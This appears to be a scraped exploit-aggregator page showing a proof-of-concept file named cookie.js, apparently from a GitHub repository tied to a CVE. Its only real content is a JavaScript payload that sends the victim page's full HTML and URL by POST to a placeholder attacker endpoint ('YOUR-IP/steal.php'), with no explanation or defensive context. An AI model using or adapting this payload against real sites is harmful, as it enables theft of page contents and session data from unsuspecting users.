4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cookie.js JS
// Updated cookie.js
fetch('http://YOUR-IP/steal.php', {
    method: 'POST',
    body: JSON.stringify({
        html: document.documentElement.innerHTML,
        url: window.location.href
    }),
    headers: { 'Content-Type': 'application/json' }
});